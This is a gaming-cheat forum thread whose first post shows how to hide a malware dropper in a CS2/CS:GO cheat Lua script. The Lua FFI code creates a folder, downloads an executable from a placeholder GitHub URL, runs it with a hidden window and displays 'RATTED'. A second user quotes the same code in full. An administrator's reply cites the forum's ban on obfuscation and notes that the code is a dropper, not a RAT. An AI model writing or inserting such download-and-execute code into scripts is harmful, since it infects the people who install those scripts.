What's new

Welcome to HvH Forum!

SignUp Now! Download Free HvH CS2/CS:GO Cheats, CFG, LUA/JS Scripts, And More!


SignUp Now!

Source Code Exploit How to insert a RAT into a LUA Script

An0mXD

An0mXD

TorDB.xyz Owner & Developer
User ID
79083
Messages
6
Reactions
6
Level
1
I think everyone knows about this but i will still share it here. this is how you Insert a RAT insto a lua script for any csgo/cs2 cheat.

You can create a Lua RAT for every cheat what has Lua API or the API allows shell ext.

Code: 
ffi.cdef[[

    typedef int(__thiscall* get_clipboard_text_count)(void*);

    typedef void(__thiscall* set_clipboard_text)(void*, const char*, int);

    typedef void(__thiscall* get_clipboard_text)(void*, int, const char*, int);

    bool CreateDirectoryA(const char* lpPathName, void* lpSecurityAttributes);

    void* __stdcall URLDownloadToFileA(void* LPUNKNOWN, const char* LPCSTR, const char* LPCSTR2, int a, int LPBINDSTATUSCALLBACK);

    void* __stdcall ShellExecuteA(void* hwnd, const char* op, const char* file, const char* params, const char* dir, int show_cmd);

    bool DeleteUrlCacheEntryA(const char* lpszUrlName);



    typedef int(__fastcall* clantag_t)(const char*, const char*);



    bool CreateDirectoryA(const char* lpPathName, void* lpSecurityAttributes);

    void* __stdcall URLDownloadToFileA(void* LPUNKNOWN, const char* LPCSTR, const char* LPCSTR2, int a, int LPBINDSTATUSCALLBACK);

    void* __stdcall ShellExecuteA(void* hwnd, const char* op, const char* file, const char* params, const char* dir, int show_cmd);

  

    int MessageBoxA(void *w, const char *txt, const char *cap, int type);



    int ShellExecuteA(void* hwnd, const char* lpOperation, const char* lpFile, const char* lpParameters, const char* lpDirectory, int nShowCmd);

]]

local Shell32 = ffi.load 'Shell32.dll'

local urlmon = ffi.load 'UrlMon'

local wininet = ffi.load 'WinInet'

ffi.C.CreateDirectoryA("C:\\ratted", nil)

wininet.DeleteUrlCacheEntryA("https://github.com/username/repository/raw/main/rat.exe")

urlmon.URLDownloadToFileA(nil, "https://github.com/username/repository/raw/main/rat.exe", "C:\\ratted\\rat.exe", 0,0)

Shell32.ShellExecuteA(nil, 'open', "C:\\ratted\\rat.exe", nil, nil, 0)

ffi.C.MessageBoxA(nil, "RATTED!!", "RATTED", 0x00004000)
 
Last edited by a moderator:
Plisskien

Plisskien

I'm not Plisskien
Administrator
User ID
1
Messages
1,406
Reactions
3,890
Level
99
Good example, this is why we have this rule
hackvshack.net

Rules

A list of rules users must stick to.
hackvshack.net hackvshack.net
where any script obfuscation is banned

Also I would rather call it dropper/downloader than RAT, because RAT is remote access trojan, thread name is misleading
 
3hunnah

3hunnah

User ID
108386
Messages
1
Reactions
-1
Level
0
An0mXD said:
I think everyone knows about this but i will still share it here. this is how you Insert a RAT insto a lua script for any csgo/cs2 cheat.

You can create a Lua RAT for every cheat what has Lua API or the API allows shell ext.

Code: 
ffi.cdef[[

    typedef int(__thiscall* get_clipboard_text_count)(void*);

    typedef void(__thiscall* set_clipboard_text)(void*, const char*, int);

    typedef void(__thiscall* get_clipboard_text)(void*, int, const char*, int);

    bool CreateDirectoryA(const char* lpPathName, void* lpSecurityAttributes);

    void* __stdcall URLDownloadToFileA(void* LPUNKNOWN, const char* LPCSTR, const char* LPCSTR2, int a, int LPBINDSTATUSCALLBACK);

    void* __stdcall ShellExecuteA(void* hwnd, const char* op, const char* file, const char* params, const char* dir, int show_cmd);

    bool DeleteUrlCacheEntryA(const char* lpszUrlName);



    typedef int(__fastcall* clantag_t)(const char*, const char*);



    bool CreateDirectoryA(const char* lpPathName, void* lpSecurityAttributes);

    void* __stdcall URLDownloadToFileA(void* LPUNKNOWN, const char* LPCSTR, const char* LPCSTR2, int a, int LPBINDSTATUSCALLBACK);

    void* __stdcall ShellExecuteA(void* hwnd, const char* op, const char* file, const char* params, const char* dir, int show_cmd);

 

    int MessageBoxA(void *w, const char *txt, const char *cap, int type);



    int ShellExecuteA(void* hwnd, const char* lpOperation, const char* lpFile, const char* lpParameters, const char* lpDirectory, int nShowCmd);

]]

local Shell32 = ffi.load 'Shell32.dll'

local urlmon = ffi.load 'UrlMon'

local wininet = ffi.load 'WinInet'

ffi.C.CreateDirectoryA("C:\\ratted", nil)

wininet.DeleteUrlCacheEntryA("https://github.com/username/repository/raw/main/rat.exe")

urlmon.URLDownloadToFileA(nil, "https://github.com/username/repository/raw/main/rat.exe", "C:\\ratted\\rat.exe", 0,0)

Shell32.ShellExecuteA(nil, 'open', "C:\\ratted\\rat.exe", nil, nil, 0)

ffi.C.MessageBoxA(nil, "RATTED!!", "RATTED", 0x00004000)
Click to expand...
attempt to index global 'ffi' (a nil value) what that mean*
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Register

Log in

Already have an account? Log in here.

Newest members

Partners

Forum statistics

Threads
2,753
Messages
23,606
Members
114,062
Latest member
jeffrey616
Most visitors online was 4044 , on 21 Oct 2024

Online statistics

Members online
34
Guests online
297
Total visitors
331
Totals may include hidden visitors.
Top